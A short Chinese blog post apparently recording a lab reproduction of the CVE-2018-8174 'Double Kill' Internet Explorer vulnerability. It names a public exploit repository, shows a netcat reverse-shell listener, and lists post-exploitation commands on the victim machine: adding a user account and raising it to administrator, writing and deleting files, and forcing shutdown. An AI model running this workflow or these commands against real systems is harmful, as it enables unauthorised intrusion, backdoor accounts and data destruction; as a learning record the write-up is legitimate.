CVE-2018-8174漏洞復現
CVE-2018-8174漏洞復現
來自專欄一個小白的學習成長之路
CVE-2018-8174 「雙殺」漏洞復現
這兩天瞭解了下CVE-2018-8174漏洞,對它進行了復現
CVE-2018-8174漏洞原理:轉自安全客下面是我的復現過程:(文末有復現視頻鏈接)
1.首先需要用到一個有公網ip的伺服器 我的伺服器ip:120.78.71.19
2.ssh登陸上去
3.下載漏洞利用腳本到伺服器
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
4.Python編譯文件
5.在伺服器上,將產生的exploit.html文件修改為index.html
6.將域名鏈接到文件所在目錄
7.監聽埠,反彈shell
nc -lvvp 19132//填編譯時的哪個埠號
8.被攻擊者用ie瀏覽器打開我的網址,出現錯誤,漏洞利用成功,成功獲取shell許可權
9.測試下,calc 先彈個計算器,成功
10.讀取被攻擊電腦中的txt文件
11.寫一個txt文件到被攻擊電腦中
echo You_have_been_hacked>hello.txt
12.操控被攻擊電腦打開一個網址,用百度測試
13.彈一個告知窗口 Hello,You have been hacked
net user wyb wei666 /add
15.將增加的普通用戶提升為管理員賬戶
16.刪除被攻擊電腦上的文件,用刪除hello.txt演示
17.最後一步,哈哈哈,關機
shutdowns -s -t 15
OK,到此結束,CVE-2018-8174 「雙殺」漏洞復現完成
CVE-2018-8174復現演示推薦閱讀: